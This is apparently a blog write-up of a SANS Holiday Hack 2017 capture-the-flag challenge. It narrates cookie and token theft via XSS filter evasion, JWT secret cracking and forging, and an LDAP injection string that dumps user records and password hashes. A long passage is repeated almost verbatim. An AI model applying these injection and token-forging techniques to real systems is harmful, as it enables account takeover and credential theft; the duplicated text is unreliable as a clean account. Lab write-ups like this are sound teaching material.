If you have not read the 1st Part then read it here.
http://oxhat.blogspot.in/2018/01/sans-holiday-hack-2017-part-1.html
So this part is all about exploiting machines.Each challenge will lead us to a page of the Great Book that will answer our questions to who was the actual culprit behind hurling those massive snowballs.
Challenge
8) Fetch the letter to Santa from the North Pole Elf Database at http://edb.northpolechristmastown.com. Who wrote the letter?
On doing an nmap scan on internal network using the compromised Alabaster's system, we can find the edb server
We will connect to Alabaster's machine again and use SSH Port forwarding to port 80 to get access to the web application.
Also we will edit our hosts file to make sure we can point at edb.northpolechristmastown.com
Now we can access the application
Once we do this we can try logging with alabaster's credentials, but it doesn't work.
Looking at the intercepted requests , we see that there is a session value in the cookie. My target is to steal the session cookie of the victim and replace our session value with it.
There is a client side simulation of a victim and we need to do a phishing attack.
This is the password reset page
There is an XSS filter working , so we need to write a XSS Filter Evasion Payload to steal the cookie
So our payload for the attack is
Now we will try to send the forged password request to the victim
On successful exploitation, we can find the cookie of the victim in our access.log
At this point I tried changing the session value with the stolen cookie value but it did not work.
The source code at the home page revealed about one more juicy information. It seems the victim is storing np-auth token in the localstorage and also it checks if it is there it sends for validation. If successful it logs into the application.
Let's modify the XSS payload to steal the np-auth token.
After successful exploitation, we find the np-auth token
Now decoding the JWT Token it reveals us some information we need to log in and also to rectify the auth to make it valid , for example the expiry date.
So let us first try cracking the np-auth token, for this we can use one jwt-cracker
The jwt-cracker reveals that the Secret used to encode JWT token is 3lv3s
Now that we have all the information we need to do the following things
1. Modify the expiry date
2. Create a new np-auth token using the secret key
3. Add the np-auth token to our local storage
We will write a small piece of code to do the 1st two task in one shot !
Executing the program gives us the jwt token for our np-auth
For the next one we will open developer console and add the javascript code to store the generated np-auth value in the localStorge
After this we refresh the page , and bingo ! We are in !
Through the proxy tool we find UI models is fetched over an XML call which is then populated in the UI of the page.
Few points to note here from the code
1. We can search "beyond" the available option of ELF and Reindeer
2. To perform operation of administrator, an administrator password will be required
Now from the debug code we can understand that there is an LDAP application running
I tried searching with a well known reindeer information , Rudolph and then using blind injection techniques tried to figure out the password fields from it , and we found there was one field called userPassword which revealed the password in hashed form
Now if we try to login with santas email and password , it wont work. Guess why ? Because we are logged into alabaster account by setting an np-auth token, so we need to generate one more auth token with Santa's information
Once we generate a new token using the department as 'administrator' and 'ou' as * and set it, on refreshing the browser we get a prompt. We need to provide the plaintext password here which we obtained by decryption of the hashed password.
http://oxhat.blogspot.in/2018/01/sans-holiday-hack-2017-part-1.html
So this part is all about exploiting machines.Each challenge will lead us to a page of the Great Book that will answer our questions to who was the actual culprit behind hurling those massive snowballs.
Challenge
8) Fetch the letter to Santa from the North Pole Elf Database at http://edb.northpolechristmastown.com. Who wrote the letter?
On doing an nmap scan on internal network using the compromised Alabaster's system, we can find the edb server
We will connect to Alabaster's machine again and use SSH Port forwarding to port 80 to get access to the web application.
Also we will edit our hosts file to make sure we can point at edb.northpolechristmastown.com
Now we can access the application
Once we do this we can try logging with alabaster's credentials, but it doesn't work.
Looking at the intercepted requests , we see that there is a session value in the cookie. My target is to steal the session cookie of the victim and replace our session value with it.
There is a client side simulation of a victim and we need to do a phishing attack.
This is the password reset page
There is an XSS filter working , so we need to write a XSS Filter Evasion Payload to steal the cookie
So our payload for the attack is
Now we will try to send the forged password request to the victim
On successful exploitation, we can find the cookie of the victim in our access.log
At this point I tried changing the session value with the stolen cookie value but it did not work.
The source code at the home page revealed about one more juicy information. It seems the victim is storing np-auth token in the localstorage and also it checks if it is there it sends for validation. If successful it logs into the application.
Let's modify the XSS payload to steal the np-auth token.
After successful exploitation, we find the np-auth token
Now decoding the JWT Token it reveals us some information we need to log in and also to rectify the auth to make it valid , for example the expiry date.
The jwt-cracker reveals that the Secret used to encode JWT token is 3lv3s
Now that we have all the information we need to do the following things
1. Modify the expiry date
2. Create a new np-auth token using the secret key
3. Add the np-auth token to our local storage
We will write a small piece of code to do the 1st two task in one shot !
Executing the program gives us the jwt token for our np-auth
For the next one we will open developer console and add the javascript code to store the generated np-auth value in the localStorge
After this we refresh the page , and bingo ! We are in !
Through the proxy tool we find UI models is fetched over an XML call which is then populated in the UI of the page.
Few points to note here from the code
1. We can search "beyond" the available option of ELF and Reindeer
2. To perform operation of administrator, an administrator password will be required
Now from the debug code we can understand that there is an LDAP application running
I tried searching with a well known reindeer information , Rudolph and then using blind injection techniques tried to figure out the password fields from it , and we found there was one field called userPassword which revealed the password in hashed form
So our final target should be writing an LDAP injection query that would allow me to bypass the query and allow me to search any data whose 'ou' can be anything that is *. Also one more thing we can assume from the message box that whenever i am trying to access Santa Panel , i am getting a notification, "You must be Claus to enter the Panel"
So I am using the gn value as "Claus" and ou = *
On doing this request with input claus*)(ou=*))(&(gn= and modifying the request little bit by adding the password field, I can dump all the users information with hashed passwords.
Response
Our next step is to get the original value of the hashed password of Claus which is 001cookielips001
Once we generate a new token using the department as 'administrator' and 'ou' as * and set it, on refreshing the browser we get a prompt. We need to provide the plaintext password here which we obtained by decryption of the hashed password.
And finally we can retrieve the letter